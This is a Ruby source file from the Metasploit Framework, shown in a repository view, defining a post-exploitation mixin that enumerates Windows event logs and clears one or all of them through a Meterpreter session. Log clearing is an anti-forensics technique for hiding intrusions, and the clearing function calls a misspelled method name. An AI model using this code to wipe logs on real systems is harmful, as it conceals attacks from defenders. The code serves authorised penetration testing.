Ashley Donaldson
75ba9110e2
Utilised it in various existing modules - this should fix some subtle bugs in specific modules' version detection.
60 lines
1.4 KiB
Ruby
60 lines
1.4 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
module Msf
|
|
class Post
|
|
module Windows
|
|
module Eventlog
|
|
include Msf::Post::Windows::Version
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Compat' => {
|
|
'Meterpreter' => {
|
|
'Commands' => %w[
|
|
stdapi_sys_eventlog_*
|
|
]
|
|
}
|
|
}
|
|
)
|
|
)
|
|
end
|
|
|
|
#
|
|
# Enumerate eventlogs
|
|
#
|
|
def eventlog_list
|
|
key = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\'
|
|
version = get_version_info
|
|
if version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Server2003_SP2)
|
|
key = "#{key}Eventlog"
|
|
else
|
|
key = "#{key}eventlog"
|
|
end
|
|
eventlogs = registry_enumkeys(key)
|
|
return eventlogs
|
|
end
|
|
|
|
#
|
|
# Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs
|
|
# that where cleared.
|
|
#
|
|
def eventlog_clear(evt = '')
|
|
evntlog = []
|
|
if evt.empty?
|
|
evntlog = eventloglist
|
|
else
|
|
evntlog << evt
|
|
end
|
|
evntlog.each do |e|
|
|
log = session.sys.eventlog.open(e)
|
|
log.clear
|
|
end
|
|
return evntlog
|
|
end
|
|
end
|
|
end
|
|
end
|
|
end
|